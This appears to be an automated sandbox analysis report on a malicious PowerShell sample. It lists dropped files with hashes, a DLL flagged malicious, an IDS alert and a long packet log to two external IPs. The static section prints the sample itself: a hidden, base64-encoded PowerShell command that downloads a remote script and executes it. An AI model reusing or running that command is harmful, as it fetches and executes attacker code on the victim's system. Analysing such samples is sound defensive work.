Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s..u...u...u.......u.......u...u...w.......u.......u......u.......u..Rich.u..........PE..L...........................................0....@..........................0......&G....@... .............................tH.......`...................!............T...........................H...@............@..l............................text...T........................... ..`.data...t....0......................@....idata..,....@......."..............@..@.rsrc........`.......@..............@..@.reloc..........,..................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\iviewers.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	6.329772980958026
Encrypted:	false
SSDEEP:	1536:L02ifPleVQ8zxlaSRslYzy26igsbuNdn4fuH1e6tsWy4cdlETcgS/iG:5iV4Qaxltsl/ggsCN3oBlQcgkiG
MD5:	33AE2B9C3E710254FE2E2CE35FF8A7C8
SHA1:	109E32187254B27E04EF18BBE1B48FAD42BCA841
SHA-256:	9C2838E120C7ED5B582BEDC6177F14A52AA578ADEEA269D0F96FC71A95BD6E68
SHA-512:	2ABE017E2F1D29FE789206D6483B9B33E7ABD0871300D678EABA15E390D55C5E197D6CEA6EA32DFDEE5F65D082574ADCC192A4FC0C9506BBBA8AD7E957E12599
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x%S;.K.;.K.;.K.paH.1.K.paN...K.paO./.K.=.N.$.K.=.O.*.K.=.H./.K.paJ.8.K.;.J.n.K.V.B.:.K.V.K.:.K.V...:.K.V.I.:.K.Rich;.K.........PE..L....rvg...........!...&............c.....................................................@..........................J..T...$K..(...............................,....>..p............................=..@............... ............................text............................... ..`.rdata...a.......b..................@..@.data...<....`.......D..............@....rsrc................N..............@..@.reloc..,............P..............@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421994169829237
Encrypted:	false
SSDEEP:	6144:QSvfpi6ceLP/9skLmb0OTTWSPHaJG8nAgeMZMMhA2fX4WABlEnN30uhiTw:7vloTTW+EZMM6DFyZ03w
MD5:	F56BC8535060B0914589B8317E8CCDA8
SHA1:	27C868DC22E6059BE9E40B1F0DDA4CC9BCFDC435
SHA-256:	60E6A12E2B5A10295A4FC6BCF65A91F5A3F23967B370855F71518A6DE809AAC6
SHA-512:	F31E840CF2A37193FCACE0CA9499BD44412D9CF288DD50E1DDA25957BCE0B64E519A0B58352581DCC9A813C61F03A2FE784C82CA6F49AFF273EA8C9F56BA67AA
Malicious:	false
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.-b%B]..............................................................................................................................................................................................................................................................................................................................................^.u.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with no line terminators
Entropy (8bit):	4.5681900236226065
TrID:
File name:	2 ps1.ps1
File size:	164 bytes
MD5:	005b395fecc3e18d5bc9acb93bf96a4f
SHA1:	34db5ff90015817fe8b2fe56ca241d6965ae95d4
SHA256:	5605af6e3cba4057057a8cc765f94d1112d1a147171e056b1bdfcc3b38a056f0
SHA512:	199d54c7cda83e493e611da4f063baec08cbc6606f8fcedce13dc2413d67133ab26d68045981006db2eb3b996513cac09654867eb3cf00eaaac0a947934e6ff8
SSDEEP:	3:VSJJFIf9oM3KpGvtFsjktRGxMtDmh/pS5hfkUkmCCHWkQogkjVvmBeaIvCLf+1de:s81R3KU7sjkt6F/8QpC2kQ9yJmgv4fkU
TLSH:	A5C0806481187E58CE1E9E6812553F4310011521D7B41300F57114147802159C61DC4C
File Content Preview:	powershell -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T19:14:09.008753+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.5	49714	185.149.146.164	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 19:14:08.375011921 CET	49714	80	192.168.2.5	185.149.146.164
Jan 2, 2025 19:14:08.379792929 CET	80	49714	185.149.146.164	192.168.2.5
Jan 2, 2025 19:14:08.379920959 CET	49714	80	192.168.2.5	185.149.146.164
Jan 2, 2025 19:14:08.382884979 CET	49714	80	192.168.2.5	185.149.146.164
Jan 2, 2025 19:14:08.387716055 CET	80	49714	185.149.146.164	192.168.2.5
Jan 2, 2025 19:14:09.008609056 CET	80	49714	185.149.146.164	192.168.2.5
Jan 2, 2025 19:14:09.008678913 CET	80	49714	185.149.146.164	192.168.2.5
Jan 2, 2025 19:14:09.008691072 CET	80	49714	185.149.146.164	192.168.2.5
Jan 2, 2025 19:14:09.008753061 CET	49714	80	192.168.2.5	185.149.146.164
Jan 2, 2025 19:14:09.228192091 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.233108997 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.233200073 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.233508110 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.238270044 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.861555099 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.861597061 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.861620903 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.861639023 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.861649990 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.861660957 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.861677885 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.861686945 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.861689091 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.861702919 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.861715078 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.861776114 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.861803055 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.866547108 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.866559982 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.866635084 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.950128078 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.950189114 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.950215101 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.950227976 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.950238943 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.950309038 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.950397968 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.950611115 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.950623035 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.950634003 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.950645924 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.950663090 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.950700045 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.951210022 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.951221943 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.951234102 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.951245070 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.951256037 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.951268911 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.951283932 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.951303005 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.951946974 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.951957941 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.951971054 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.951981068 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.951992989 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.952013016 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.952035904 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.952805042 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.952846050 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.952851057 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:09.952858925 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:09.952898026 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.038765907 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.038785934 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.038855076 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.038868904 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.038882017 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.038892984 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.038903952 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.038942099 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.038964987 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.039242029 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.039361954 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.039410114 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.039412022 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.039427042 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.039437056 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.039462090 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.039752007 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.039764881 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.039777040 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.039787054 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.039797068 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.039803028 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.039809942 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.039835930 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.040443897 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.040457964 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.040494919 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.040504932 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.040522099 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.040534019 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.040546894 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.040549994 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.040561914 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.040574074 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.040579081 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.040601015 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.041516066 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.041527987 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.041538954 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.041549921 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.041559935 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.041568041 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.041572094 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.041584969 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.041594982 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.041598082 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.041616917 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.041636944 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.042397976 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.042411089 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.042421103 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.042445898 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.042464018 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.042479038 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.042490005 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.042505980 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.042516947 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.042526960 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.042534113 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.042552948 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.043354034 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.043373108 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.043385029 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.043417931 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.043438911 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.043720961 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.043740988 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.043781996 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.127912045 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.127937078 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.127954960 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.127974033 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.127985001 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.127995968 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128000975 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128007889 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128022909 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128076077 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128097057 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128108978 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128118038 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128129005 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128139973 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128148079 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128153086 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128165960 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128170013 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128180027 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128196001 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128197908 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128213882 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128215075 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128228903 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128238916 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128249884 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128258944 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128261089 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128274918 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128278017 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128314972 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128346920 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128411055 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128458023 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128464937 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128477097 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128488064 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128498077 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128513098 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128516912 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128525019 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128535986 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128537893 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128550053 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128552914 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128583908 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128721952 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128734112 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128745079 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128757000 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128767014 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128772974 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128778934 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128802061 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128817081 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128824949 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128837109 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128846884 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128859043 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.128880024 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128890038 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.128899097 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129183054 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129194021 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129211903 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129224062 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129225016 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.129235983 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129246950 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129251003 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.129259109 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129268885 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.129298925 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129301071 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.129312038 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129348040 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.129353046 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129364014 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129379034 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129391909 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129400015 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.129404068 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129416943 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129420996 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.129452944 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129451036 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.129471064 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129482985 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129498959 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129499912 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.129512072 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129523039 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129527092 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.129534006 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129547119 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.129561901 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.129571915 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.130162954 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.130175114 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.130184889 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.130196095 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.130206108 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.130211115 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.130218029 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.130239964 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.130253077 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.175220966 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.175235987 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.175246954 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.175374031 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.215178013 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.215207100 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.215305090 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.216115952 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216129065 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216145992 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216162920 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216173887 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216183901 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216192961 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.216197014 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216208935 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216242075 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216244936 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.216264009 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.216267109 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216285944 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216325998 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.216341019 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216352940 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216375113 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216391087 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.216413021 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.216428041 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216439009 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216449976 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216461897 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216478109 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.216511965 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.216526985 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216567039 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216579914 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.216624022 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.375633001 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.556200027 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.560981989 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.738917112 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.738940954 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.738998890 CET	49716	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:10.739028931 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739223003 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739233971 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739244938 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739255905 CET	80	49716	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:10.739267111 CET	80	49716	147.45.44.131	192.168.2.5
